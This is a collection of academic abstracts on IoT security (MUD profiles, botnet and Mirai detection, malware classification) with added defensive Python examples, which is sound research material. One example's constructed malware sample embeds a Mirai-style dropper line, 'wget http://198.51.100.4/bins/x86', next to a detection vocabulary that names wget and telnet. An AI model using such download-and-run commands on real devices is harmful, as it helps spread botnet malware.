Verifying and Monitoring IoTs Network Behavior using MUD Profiles
IoT devices are increasingly being implicated in cyber-attacks, raising
community concern about the risks they pose to critical infrastructure,
corporations, and citizens. In order to reduce this risk, the IETF is pushing
IoT vendors to develop formal specifications of the intended purpose of their
IoT devices, in the form of a Manufacturer Usage Description (MUD), so that
their network behavior in any operating environment can be locked down and
verified rigorously. This paper aims to assist IoT manufacturers in developing
and verifying MUD profiles, while also helping adopters of these devices to
ensure they are compatible with their organizational policies and track devices
network behavior based on their MUD profile. Our first contribution is to
develop a tool that takes the traffic trace of an arbitrary IoT device as input
and automatically generates the MUD profile for it. We contribute our tool as
open source, apply it to 28 consumer IoT devices, and highlight insights and
challenges encountered in the process. Our second contribution is to apply a
formal semantic framework that not only validates a given MUD profile for
consistency, but also checks its compatibility with a given organizational
policy. We apply our framework to representative organizations and selected
devices, to demonstrate how MUD can reduce the effort needed for IoT acceptance
testing. Finally, we show how operators can dynamically identify IoT devices
using known MUD profiles and monitor their behavioral changes on their network.
Comment: 17 pages, 17 figures. arXiv admin note: text overlap with arXiv:1804.0435
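The two steps the abstract describes, generating a profile from observed flows and then checking it for consistency and against an organizational policy, as an added example that is not the paper's tool or code. The flow records are constructed; the JSON uses the RFC 8520 container names (ietf-mud, ietf-access-control-list, ietf-acldns) but is illustrative rather than a validated MUD file, and the shape of the organizational policy (allowed (protocol, port) pairs plus blocked host suffixes) is an assumption made here.

```python
"""Generate a MUD-style profile from observed flows and check it against a site policy.

Added example: this is not the paper's MUD generation tool. The flow records are
constructed; the JSON layout follows the RFC 8520 container names but is illustrative,
and the organisational policy shape (allowed (proto, port) pairs plus blocked host
suffixes) is an assumption made for this example.
"""
import json

# Constructed flow records for a hypothetical camera: (direction, IP proto, remote host, remote port)
FLOWS = [
    ("from-device", 6, "api.example-cam.test", 443),
    ("from-device", 6, "api.example-cam.test", 443),   # repeat: must collapse into one ACE
    ("from-device", 17, "ntp.example-cam.test", 123),
    ("to-device", 6, "api.example-cam.test", 443),     # inbound: match on source host/port
    ("from-device", 6, "tracker.example-ads.test", 80),
]
PROTO_NAME = {6: "tcp", 17: "udp"}


def build_mud(model, flows):
    """Aggregate flows into one ACE per (direction, proto, host, port) and wrap them in MUD JSON."""
    aces = {"from-device": {}, "to-device": {}}
    for direction, proto, host, port in flows:
        key = (proto, host, port)
        if key in aces[direction]:
            continue
        l4 = PROTO_NAME[proto]
        inbound = direction == "to-device"
        port_key = "source-port" if inbound else "destination-port"
        dns_key = "ietf-acldns:src-dnsname" if inbound else "ietf-acldns:dst-dnsname"
        aces[direction][key] = {
            "name": f"{direction}-{l4}-{host}-{port}",
            "matches": {
                "ipv4": {"protocol": proto, dns_key: host},
                l4: {port_key: {"operator": "eq", "port": port}},
            },
            "actions": {"forwarding": "accept"},
        }
    acls, policies = [], {}
    for direction, entries in aces.items():
        acl_name = f"{direction}-ipv4-{model}"
        acls.append({"name": acl_name, "type": "ipv4-acl-type",
                     "aces": {"ace": list(entries.values())}})
        policies[f"{direction}-policy"] = {"access-lists": {"access-list": [{"name": acl_name}]}}
    return {
        "ietf-mud:mud": {"mud-version": 1, "mud-url": f"https://example.test/{model}.json",
                         "cache-validity": 48, "is-supported": True, "systeminfo": model,
                         **policies},
        "ietf-access-control-list:acls": {"acl": acls},
    }


def check_consistency(mud):
    """Structural checks: every referenced ACL exists and ACE names are unique within an ACL."""
    problems = []
    acls = {a["name"]: a for a in mud["ietf-access-control-list:acls"]["acl"]}
    for pol in ("from-device-policy", "to-device-policy"):
        for ref in mud["ietf-mud:mud"][pol]["access-lists"]["access-list"]:
            if ref["name"] not in acls:
                problems.append(f"{pol} references missing ACL {ref['name']}")
    for acl in acls.values():
        names = [ace["name"] for ace in acl["aces"]["ace"]]
        if len(names) != len(set(names)):
            problems.append(f"duplicate ACE names in {acl['name']}")
    return problems


def check_policy(mud, org_policy):
    """Return the names of ACEs that the organisational policy would refuse."""
    refused = []
    for acl in mud["ietf-access-control-list:acls"]["acl"]:
        for ace in acl["aces"]["ace"]:
            ip = ace["matches"]["ipv4"]
            proto = ip["protocol"]
            host = ip.get("ietf-acldns:dst-dnsname") or ip.get("ietf-acldns:src-dnsname")
            l4 = ace["matches"][PROTO_NAME[proto]]
            port = (l4.get("destination-port") or l4.get("source-port"))["port"]
            port_ok = (proto, port) in org_policy["allowed_ports"]
            host_ok = not any(host.endswith(s) for s in org_policy["blocked_suffixes"])
            if not (port_ok and host_ok):
                refused.append(ace["name"])
    return refused


# Assumed organisational policy: only TCP/443 and UDP/123 egress, and no ad-tracker hosts.
ORG_POLICY = {"allowed_ports": {(6, 443), (17, 123)}, "blocked_suffixes": [".example-ads.test"]}

if __name__ == "__main__":
    profile = build_mud("cam-x1", FLOWS)
    print(json.dumps(profile, indent=1))
    print("consistency problems:", check_consistency(profile))
    print("refused by policy:", check_policy(profile, ORG_POLICY))
```

The policy check deliberately reads the ACE the way a MUD controller would (host from the dnsname match, port from whichever side the direction put it on), so a profile that passes consistency can still be refused for a single egress entry, here the tracker flow, which is the acceptance-testing decision the abstract is about.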
Study of Common Subgraphs of System Call Dependency Graphs for Malware Classification (original title: Étude des sous-graphes communs des Graphes de Dépendance d'Appels Systèmes pour la classification de logiciels malveillants)
Distinguishing legitimate software from malicious software is a problem that requires a lot of expertise. One approach to building malware detection software is to extract System Call Dependency Graphs (SCDGs), which summarize the behavior of a program. Once SCDGs are extracted, a learning phase identifies sub-graphs characteristic of malicious behaviors. To classify the graph of an unknown binary, we check whether it contains such sub-graphs. These techniques have proved effective, but no analysis of the sub-graphs extracted during the learning phase had been conducted so far. We study the sub-graphs we find and showcase preprocessing steps on the graphs that improve learning and classification performance. The approach has been applied to graphs extracted from Mirai, a malware which created a large botnet in 2016 to perform distributed denial of service attacks. We show that the preprocessing step tremendously improves the speed of learning and classification.
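The learn-then-contain workflow above, as an added example that is not the paper's implementation. Each SCDG is constructed here as a list of directed (syscall, dependent syscall) edges; a characteristic sub-graph is a small connected edge set found in at least one malicious training graph and in no benign one; and the preprocessing (dropping self-loops and duplicate edges) is an assumption for illustration, not the paper's exact preprocessing.

```python
"""Learn characteristic subgraphs from System Call Dependency Graphs and classify by containment.

Added example, not the paper's implementation. Each SCDG is constructed below as a list of
directed (syscall -> dependent syscall) edges; a characteristic subgraph is a small connected
set of edges found in at least one malicious training graph and in no benign one. The
preprocessing (dropping self-loops and duplicate edges) is an assumption for illustration.
"""
from collections import deque
from itertools import combinations

# Constructed training graphs.
MALICIOUS = [
    [("socket", "connect"), ("connect", "send"), ("open", "read"), ("read", "read"),
     ("socket", "connect")],                                   # duplicate edge + self-loop
    [("socket", "connect"), ("connect", "send"), ("send", "recv"), ("recv", "execve")],
]
BENIGN = [
    [("open", "read"), ("read", "write"), ("read", "read")],
    [("socket", "connect"), ("open", "read")],                  # connects, but never sends
]


def preprocess(edges):
    """Drop self-loops and collapse duplicate edges; both add size without adding behaviour."""
    return frozenset(e for e in edges if e[0] != e[1])


def connected(edge_set):
    """True when the edges form one weakly connected component."""
    adj = {}
    for a, b in edge_set:
        adj.setdefault(a, set()).add(b)
        adj.setdefault(b, set()).add(a)
    start = next(iter(adj))
    seen, queue = {start}, deque([start])
    while queue:
        for n in adj[queue.popleft()]:
            if n not in seen:
                seen.add(n)
                queue.append(n)
    return len(seen) == len(adj)


def learn_signatures(malicious, benign, size=2):
    """Enumerate connected `size`-edge subgraphs of malicious graphs absent from every benign graph."""
    mal = [preprocess(g) for g in malicious]
    ben = [preprocess(g) for g in benign]
    sigs = set()
    for g in mal:
        for combo in combinations(sorted(g), size):
            cand = frozenset(combo)
            if connected(cand) and not any(cand <= b for b in ben):
                sigs.add(cand)
    return sigs


def classify(edges, sigs):
    """Malicious if the (preprocessed) graph contains any learned signature; returns the hit."""
    g = preprocess(edges)
    for s in sigs:
        if s <= g:
            return True, sorted(s)
    return False, []


if __name__ == "__main__":
    sigs = learn_signatures(MALICIOUS, BENIGN)
    for s in sigs:
        print("signature:", sorted(s))
    unknown = [("open", "read"), ("socket", "connect"), ("connect", "send"), ("send", "recv")]
    print("unknown ->", classify(unknown, sigs))
    print("benign  ->", classify(BENIGN[1], sigs))
```

Note that the benign training set is what keeps `socket -> connect` on its own from becoming a signature: only the connected pair that continues into `send` separates the malicious graphs from the benign ones, and the self-loop and duplicate edge in the first malicious graph are removed before enumeration so they cannot inflate the candidate set.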
Monitoring morphisms to support sustainable interoperability of enterprise systems
Dissertation to obtain the Master's degree in Electrical Engineering and Computer Science
Nowadays, organizations are required to be part of a global collaborative world. Sometimes this is the only way they can access new and wider markets, reaching new opportunities and skills and sharing assets, e.g. tools and lessons learnt. However, due to the different sources of enterprise models and semantics, organizations are experiencing difficulties in exchanging vital information electronically and seamlessly. To solve this issue, most of them try to attain interoperability by establishing peer-to-peer mappings with different business partners, or in optimized networks using neutral data standards to regulate communications. Moreover, systems are more and more dynamic, changing frequently to answer new customer requirements, causing new interoperability problems and a reduction of efficiency. This dissertation proposes a multi-agent system to monitor existing enterprise systems, capable of detecting morphism changes. With this, breaks in network harmonization are detected in a timely manner, and possible solutions are suggested to regain the interoperable status, thus enhancing robustness for reaching sustainability of business networks.
Exploring the use of conversational agents to improve cyber situational awareness in the Internet of Things (IoT).
The Internet of Things (IoT) is an emerging paradigm, which aims to extend the power of the Internet beyond computers and smartphones to a vast and growing range of "things" - devices, processes and environments. The result is an interconnected world where humans and devices interact with each other, establishing a smart environment for the continuous exchange of information and services. Billions of everyday devices such as home appliances, surveillance cameras, wearables and doorbells, enriched with computational and networking capabilities, have already been connected to the Internet. However, as the IoT has grown, the demand for low-cost, easy-to-deploy devices has also increased, leading to the production of millions of insecure Internet-connected smart devices. Many of these devices can be easily exploited and leveraged to perform large-scale attacks on the Internet, such as the recently witnessed botnet attacks. Since these attacks often target consumer-level products, which commonly lack a screen or user interface, it can be difficult for users to identify signs of infection and be aware of devices that have been compromised. This thesis presents four studies which collectively explored how user awareness of threats in consumer IoT networks could be improved. Maintaining situational awareness of what is happening within a home network is challenging, not least because malicious activity often occurs in devices which are not easily monitored. This thesis evaluated the effectiveness of conversational agents to improve Cyber Situational Awareness. In doing so, it presented the first study to investigate their ability to help users improve their perception of smart device activity, comprehend this in the context of their home environment, and project this knowledge to determine if a threat had occurred or may occur in the future. 
The research demonstrated how a BLSTM-RNN with word embedding could be used to extract semantic meaning from packets to perform deep packet inspection and detect IoT botnet activity. Specifically, the model's use of contextual information from both the past and the future enabled better predictions about the current state (packet), due to the sequential nature of network traffic. In addition, a cross-sectional study examined users' awareness and perception of threats and found that, although users value security and privacy, they found it difficult to identify threats and infected devices. Finally, novel cross-sectional and longitudinal studies evaluated the use of conversational agents and demonstrated them to be an effective and efficient method of improving Cyber Situational Awareness. In particular, this was shown to be true when using a multi-modal approach combining aural, verbal and visual modalities.
Multilayer framework for botnet detection using machine learning algorithms
Acknowledgments: The authors wish to thank Universiti Teknologi Malaysia (UTM) for its support under Research University Grant Vot 20H04 and Malaysia Research University Network (MRUN) Vot 4L876. The authors would like to acknowledge that this work was supported/funded by the Ministry of Higher Education under the Fundamental Research Grant Scheme (FRGS/1/2018/ICT04/UTM/01/1). The work was also partially supported by the Specific Research project (SPEV) at the Faculty of Informatics and Management, University of Hradec Kralove, Czech Republic, under Grant 2102-2021. The authors are grateful for the support of student Sebastien Mambou in consultations regarding application aspects. The authors also wish to thank the Ministry of Education Malaysia for the Hadiah Latihan Persekutuan (HLP) scholarship to complete the research.
A botnet is a network of malware-infected machines that an attacker, called a botmaster, controls remotely. Botnets can perform massive cyber-attacks such as DDoS, spam, click fraud, and information and identity theft. A botnet can also avoid detection by security systems. The traditional method of detecting botnets, signature-based analysis, is unable to detect unseen botnets. Behavior-based analysis seems a promising solution to the current trend of botnets that keep evolving. This paper proposes a multilayer framework for botnet detection using machine learning algorithms, consisting of a filtering module and a classification module, to detect the botnet's command and control server. We set several criteria for our framework: it must be structure-independent and protocol-independent, and able to detect botnets that use encapsulation. We used behavior-based analysis through flow-based features, analyzing packet headers aggregated over 1-s time intervals. This type of analysis enables detection even when packets are encapsulated, such as in a VPN tunnel. We also extended the experiment to different time intervals, but the 1-s interval gave the best results. Our botnet detection method achieves an F-score of up to 92%, and the lowest false-negative rate was 1.5%.
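The header-only, 1-s aggregation the abstract relies on, as an added example that is not the authors' framework. The packet records are constructed; the feature set (packet and byte counts, peer and port cardinality, inter-arrival statistics) is a common header-only choice and an assumption here rather than the paper's exact feature list, and the beaconing rule at the end stands in for their ML classifier.

```python
"""Aggregate packet headers into 1-second windows and derive flow-based features.

Added example, not the authors' framework. The header records are constructed; the
feature set is a common header-only choice and an assumption here, not the paper's exact
feature list, and the beaconing rule at the end is a placeholder for their ML classifier.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed header records: (timestamp, src_ip, dst_ip, proto, dst_port, length_bytes).
# Host .5 browses; host .7 sends small, evenly spaced packets to one peer on one port,
# the kind of pattern that survives even when the payload is inside a VPN tunnel.
PACKETS = [
    (100.01, "10.0.0.5", "203.0.113.9", "tcp", 443, 1200),
    (100.05, "10.0.0.5", "203.0.113.9", "tcp", 443, 1200),
    (100.60, "10.0.0.5", "203.0.113.20", "tcp", 443, 800),
    (101.00, "10.0.0.7", "198.51.100.4", "tcp", 8080, 60),
    (101.25, "10.0.0.7", "198.51.100.4", "tcp", 8080, 60),
    (101.50, "10.0.0.7", "198.51.100.4", "tcp", 8080, 60),
    (101.75, "10.0.0.7", "198.51.100.4", "tcp", 8080, 60),
]


def window_features(packets, interval=1.0):
    """Group packets by (src_ip, window start) and compute per-window header statistics."""
    buckets = defaultdict(list)
    for ts, src, dst, proto, dport, size in packets:
        start = int(ts // interval) * interval
        buckets[(src, start)].append((ts, dst, proto, dport, size))
    feats = {}
    for key, pk in buckets.items():
        pk.sort()
        gaps = [b[0] - a[0] for a, b in zip(pk, pk[1:])]
        feats[key] = {
            "pkts": len(pk),
            "bytes": sum(p[4] for p in pk),
            "mean_len": mean(p[4] for p in pk),
            "uniq_dst": len({p[1] for p in pk}),
            "uniq_dport": len({p[3] for p in pk}),
            "iat_mean": mean(gaps) if gaps else 0.0,
            "iat_std": pstdev(gaps) if gaps else 0.0,
        }
    return feats


def beacon_like(f, max_len=100, max_jitter=0.02, min_pkts=3):
    """Assumed heuristic: several small packets at near-constant spacing to a single peer."""
    return (f["pkts"] >= min_pkts and f["mean_len"] <= max_len
            and f["uniq_dst"] == 1 and f["iat_std"] <= max_jitter)


def suspicious_windows(packets, interval=1.0):
    """Return the (src_ip, window start) keys whose features look like C2 beaconing."""
    return sorted(k for k, f in window_features(packets, interval).items() if beacon_like(f))


if __name__ == "__main__":
    for key, f in sorted(window_features(PACKETS).items()):
        print(key, f)
    print("suspicious:", suspicious_windows(PACKETS))
    print("2-second windows flagged:", suspicious_windows(PACKETS, interval=2.0))
```

Every feature is computed from timestamps, addresses, ports and lengths only, which is why the same code runs unchanged on tunnelled traffic where only the outer header is visible; changing `interval` is the experiment the abstract describes, and on this constructed input the beaconing host is flagged at both 1-s and 2-s windows.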
On Leveraging Next-Generation Deep Learning Techniques for IoT Malware Classification, Family Attribution and Lineage Analysis
Recent years have witnessed the emergence of new and more sophisticated malware targeting insecure Internet of Things (IoT) devices, as part of orchestrated large-scale botnets. Moreover, the
public release of the source code of popular malware families such as Mirai [1] has spawned diverse variants, making it harder to disambiguate their ownership, lineage, and correct label. Such a rapidly
evolving landscape makes it also harder to deploy and generalize effective learning models against retired, updated, and/or new threat campaigns. To mitigate such threats, there is an utmost need for effective IoT malware detection, classification and family attribution, which provide essential steps towards initiating attack mitigation/prevention countermeasures, as well as understanding the evolutionary trajectories and tangled relationships of IoT malware. This is particularly challenging
due to the lack of fine-grained empirical data about IoT malware, the diverse architectures of IoT-targeted devices, and the massive code reuse between IoT malware families.
To address these challenges, in this thesis, we leverage the general lack of obfuscation in IoT malware to extract and combine static features from multi-modal views of the executable binaries (e.g., images, strings, assembly instructions), along with Deep Learning (DL) architectures for effective IoT malware classification and family attribution. Additionally, we aim to address concept drift and the limitations of inter-family classification due to the evolutionary nature of IoT malware, by detecting in-class evolving IoT malware variants and interpreting the meaning behind their mutations. To this end, we perform the following to achieve our objectives:
First, we analyze 70,000 IoT malware samples collected by a specialized IoT honeypot and popular malware repositories in the past 3 years. Consequently, we utilize features extracted from strings- and image-based representations of IoT malware to implement a multi-level DL architecture that fuses the learned features from each sub-component (i.e., images, strings) through a neural network classifier. Our in-depth experiments with four prominent IoT malware families highlight
the significant accuracy of the proposed approach (99.78%), which outperforms conventional single-level classifiers, by relying on different representations of the target IoT malware binaries that do not
require expensive feature extraction. Additionally, we utilize our IoT-tailored approach for labeling unknown malware samples, while identifying new malware strains.
Second, we seek to identify when the classifier shows signs of aging, by which it fails to effectively recognize new variants and adapt to potential changes in the data. Thus, we introduce a robust and effective method that uses contrastive learning and attentive Transformer models to learn and compare semantically meaningful representations of IoT malware binaries and codes without the need for expensive target labels. We find that the evolution of IoT binaries can be used as an augmentation strategy to learn effective representations to contrast (dis)similar variant pairs. We discuss the impact and findings of our analysis and present several evaluation studies to highlight the tangled relationships of IoT malware, as well as the efficiency of our contrastively learned fine-grained feature vectors in preserving semantics and reducing out-of-vocabulary size in cross-architecture IoT malware binaries.
We conclude this thesis by summarizing our findings and discussing research gaps that pave the way for future work.
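The two static views the first contribution fuses, printable strings and a byte image, as an added example that is not the thesis code. The binary is a constructed byte string that mimics the start of a stripped ELF (real use would read the file from disk); the image width, the minimum string length and the histogram-plus-token feature vector are assumptions made for illustration, not the thesis' feature definitions.

```python
"""Two obfuscation-free static views of an IoT binary, strings and a byte image, and their fusion.

Added example, not the thesis code. The binary is a constructed byte string; real use
would read the ELF from disk. Image width, minimum string length and the feature vector
layout are assumptions made for illustration.
"""
import re
from collections import Counter

SAMPLE = (b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8
          + b"/bin/busybox\x00"
          + b"wget http://198.51.100.4/bins/x86\x00"
          + b"\xde\xad\xbe\xef" * 6
          + b"telnet\x00root\x00admin\x00")


def printable_strings(data, min_len=4):
    """ASCII runs of at least min_len printable bytes (the usual `strings` view)."""
    return [s.decode("ascii") for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def byte_image(data, width=16):
    """Reshape raw bytes into a width-column grayscale matrix, zero-padding the last row."""
    rows = [list(data[i:i + width]) for i in range(0, len(data), width)]
    if rows and len(rows[-1]) < width:
        rows[-1] += [0] * (width - len(rows[-1]))
    return rows


def string_tokens(strings):
    """Bag of lower-cased alphanumeric tokens: the kind of input a string branch consumes."""
    tokens = Counter()
    for s in strings:
        tokens.update(re.findall(r"[a-z0-9]+", s.lower()))
    return tokens


def fused_features(data, vocab):
    """Concatenate a normalised 256-bin byte histogram with token counts over a fixed vocabulary."""
    hist = [0] * 256
    for b in data:
        hist[b] += 1
    n = len(data)
    tokens = string_tokens(printable_strings(data))
    return [c / n for c in hist] + [tokens.get(t, 0) for t in vocab]


if __name__ == "__main__":
    VOCAB = ["busybox", "wget", "telnet", "admin", "execve"]   # assumed fixed vocabulary
    print(printable_strings(SAMPLE))
    print("image rows:", len(byte_image(SAMPLE)))
    print("feature vector length:", len(fused_features(SAMPLE, VOCAB)))
```

Both views are cheap precisely because the sample is not obfuscated: the strings come straight out of the raw bytes, and the image is nothing more than those bytes reshaped, so the expensive part of a pipeline like the one described is the learned fusion, not the extraction.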
Monitoring and Information Alignment in Pursuit of an IoT-Enabled Self-Sustainable Interoperability
To remain competitive with big corporations, small and medium-sized enterprises (SMEs) often need to be more dynamic, adapt to new business situations, react faster, and thereby survive in today's global economy. To do so, SMEs normally seek to create consortiums, thus gaining access to new and more opportunities. However, this strategy may also lead to complications. Due to the different sources of enterprise models and semantics, organizations are experiencing difficulties in seamlessly exchanging vital information via electronic means. In their attempt to address this issue, most seek to achieve interoperability by establishing peer-to-peer mappings with different business partners, or by using neutral data standards to regulate communications in optimized networks. Moreover, systems are more and more dynamic, frequently changing to answer new customer requirements, causing new interoperability problems and a reduction of efficiency. The devices used in enterprises are another constantly changing element: alongside the Enterprise Information Systems, devices are used to register internal data and to monitor several aspects of the business. These devices change constantly, following the evolution and growth of the market, so it is important to monitor them and to build a model representation of them. This dissertation proposes a self-sustainable interoperable framework that monitors existing enterprise information systems and their devices, watches the device/enterprise network for changes, and automatically detects model changes. With this, network harmonization disruptions are detected in a timely way, and possible solutions are suggested to regain the interoperable status, thus enhancing robustness for reaching sustainability of business networks over time.
DIMI: Intelligent Detection of Mirai Botnets in IoT Networks (original title: DIMI: Detecção Inteligente de Botnets Mirai em Redes IoT)
The emerging usage of the Internet of Things (IoT) paradigm brings, together with new services, new threats to information security. Among these threats is the Mirai botnet, which performed several Distributed Denial of Service (DDoS) cyberattacks by exploiting the vulnerabilities of IoT devices. Within this context, this paper presents a mechanism for detecting Mirai botnet attacks on IoT networks using ML techniques, comparing different approaches. The mechanism was evaluated using a set of traffic data from real IoT devices, achieving 99% precision in detecting Mirai botnet attacks.
Machine Learning in IoT Security: Current Solutions and Future Challenges
The future Internet of Things (IoT) will have a deep economical, commercial
and social impact on our lives. The participating nodes in IoT networks are
usually resource-constrained, which makes them attractive targets for cyber
attacks. In this regard, extensive efforts have been made to address the
security and privacy issues in IoT networks primarily through traditional
cryptographic approaches. However, the unique characteristics of IoT nodes
render the existing solutions insufficient to encompass the entire security
spectrum of the IoT networks. This is, at least in part, because of the
resource constraints, heterogeneity, massive real-time data generated by the
IoT devices, and the extensively dynamic behavior of the networks. Therefore,
Machine Learning (ML) and Deep Learning (DL) techniques, which are able to
provide embedded intelligence in the IoT devices and networks, are leveraged to
cope with different security problems. In this paper, we systematically review
the security requirements, attack vectors, and the current security solutions
for the IoT networks. We then shed light on the gaps in these security
solutions that call for ML and DL approaches. We also discuss in detail the
existing ML and DL solutions for addressing different security problems in IoT
networks. Finally, based on the detailed investigation of the existing
solutions in the literature, we discuss the future research directions for ML-
and DL-based IoT security.